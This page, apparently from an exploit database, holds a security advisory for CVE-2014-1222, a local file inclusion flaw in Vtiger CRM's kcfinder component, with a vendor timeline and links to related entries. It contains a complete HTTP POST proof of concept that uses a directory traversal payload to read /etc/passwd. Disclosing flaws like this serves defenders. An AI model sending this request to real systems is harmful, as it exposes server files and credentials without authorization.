Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtPortcullis1337DAY-ID-22020
HistoryMar 12, 2014 - 12:00 a.m.

Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA - Local File Inclusion Vulnerability

2014-03-1200:00:00
Portcullis
0day.today
38

EPSS

0.053

Percentile

93.1%

JSON

Vtiger CRM versions 5.4.0, 6.0 RC, and 6.0.0 GA suffer from a local file inclusion vulnerability.

CVE:    CVE-2014-1222
Vendor:     Vtiger
Product:    CRM
Affected version:   Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version:  Vtiger 6.0.0 Security patch 1
Reported by:    Jerzy Kramarz
Details:
 
A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.
 
The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.
 
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
 
dir=files&file=/../../../../../../../../../../../etc/passwd
 
Note: In order to exploit this vulnerability an attacker has to be authenticated.
Impact:
 
This vulnerability gives an attacker the ability to read local files from the server filesystem.
Exploit:
 
Exploit code is not required.
 
Vendor status:
23/12/2013  Advisory created
03/01/2014  Vendor contacted
14/01/2014  CVE obtained
27/01/2014  Vendor contact reattempted
10/02/2014  Vendor working on a fix
12/02/2014  Fix released
13/02/2014  Fix confirmed
11/03/2014  Published

#  0day.today [2018-01-02]  #

Related

prion 1
packetstorm 2
exploitdb 3
openvas 1
cvelist 1
nvd 1
cve 1
exploitpack 2
securityvulns 2
dsquare 1
seebug 1
zdt 1
prion
prion
Directory traversal
2014-08-12 23:55:00
packetstorm
packetstorm
Vtiger CRM 5.4.0 / 6.0 RC / 6.0.0 GA Local File Inclusion
2014-03-12 00:00:00
FiyoCMS 2.0.1.8 XSS / SQL Injection / URL Bypass
2015-03-30 00:00:00
exploitdb
exploitdb
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion
2014-03-12 00:00:00
KCFinder 2.51 - Local File Disclosure
2013-08-15 00:00:00
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-03-31 00:00:00
openvas
openvas
vTiger CRM 'file' Arbitrary File Disclosure Vulnerability
2014-08-25 00:00:00
cvelist
cvelist
CVE-2014-1222
2014-08-12 23:00:00
nvd
nvd
CVE-2014-1222
2014-08-12 23:55:03
cve
cve
CVE-2014-1222
2014-08-12 23:55:03
exploitpack
exploitpack
vTiger CRM 5.4.06.0 RC6.0.0 GA - browse.php Local File Inclusion
2014-03-12 00:00:00
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-03-31 00:00:00
securityvulns
securityvulns
CVE-2014-1222 - Local File Inclusion in Vtiger CRM
2014-05-05 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2014-05-05 00:00:00
dsquare
dsquare
vTiger CRM 5.4.0 kcfinder LFI
2014-04-02 00:00:00
seebug
seebug
Vtiger CRM文件包含漏洞
2014-03-13 00:00:00
zdt
zdt
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-04-02 00:00:00

EPSS

0.053

Percentile

93.1%

JSON
Related for 1337DAY-ID-22020
prion1packetstorm2exploitdb3openvas1cvelist1nvd1cve1exploitpack2securityvulns2dsquare1seebug1zdt1